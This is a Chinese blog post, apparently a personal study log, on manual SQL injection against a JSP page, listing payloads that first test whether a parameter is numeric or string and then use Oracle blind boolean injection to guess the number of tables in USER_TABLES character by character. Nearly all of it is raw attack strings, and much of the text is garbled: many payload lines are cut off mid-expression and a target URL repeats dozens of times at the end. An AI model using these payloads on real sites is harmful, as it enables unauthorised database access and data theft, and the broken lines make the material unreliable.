手工注射JSP学习



1、 判断注入类型(数字型还是字符型)
字符型和数字型数据判断:(希望有人能进一步的细化,细分为数字型和字符型判断两部分)
And user>char(0)
And user http://www.test.net/index_kaoyan_view.jsp?id=117' And user>char(0) And '1'='1
' And userchar(0) And '%25'='
' And userchar(0) And (' ')=('
') And user http://www.test.net/index_kaoyan_view.jsp?id=117 And str(98)>str(97)
And str(98)

' And str(98)>str(97) And '1'='1
' And str(98)str(97) And '%25'='

 

' And user http://www.test.net/index_kaoyan_view.jsp?id=117' And str(98)str(97) And (' ')=('
') And str(98)

出现正常的页面:
And USER>CHR(0)
And USER

2、 猜解表数量和表名

数据库数量为3:
And 0<=nvl(length((SELECT COUNT (*) FROM USER_TABLES)),0)

And 1>=nvl(length((SELECT COUNT (*) FROM USER_TABLES)),0)

And 2<=nvl(length((SELECT COUNT (*) FROM USER_TABLES)),0)

And 4>=nvl(length((SELECT COUNT (*) FROM USER_TABLES)),0)

And 3=nvl(length((SELECT COUNT (*) FROM USER_TABLES)),0)

And UNISTR(1)>UNISTR(0)

以下为猜解数据表数量
数据表第一位为:1

And 52=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),1,1))
And 52>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),1,1))

And 49=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),1,1))


数据表第二位为:3
And 49=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

And 95=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

And 77=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))
And 77>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

And 70=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

And 70>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

And 67=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

And 67>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

And 65=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

And 65>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

And 109=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

And 109>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

And 102=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

And 102>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

And 99=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

And 99>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

And 97=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

And 97>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

And 53=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

And 53>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

And 51=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

数据表第三位为:1
And 51=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

And 95=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

And 77=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

And 77>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

And 70=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

And 70>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

And 67=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

And 67>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

And 65=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

And 65>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

And 109=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

And 109>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

And 102=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

And 102>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

And 102>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

And 99=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

And 99>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

And 97=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

And 97>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

And 54=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

And 54>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

And 52=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

And 52>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

And 52>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

And 49=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1)) http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值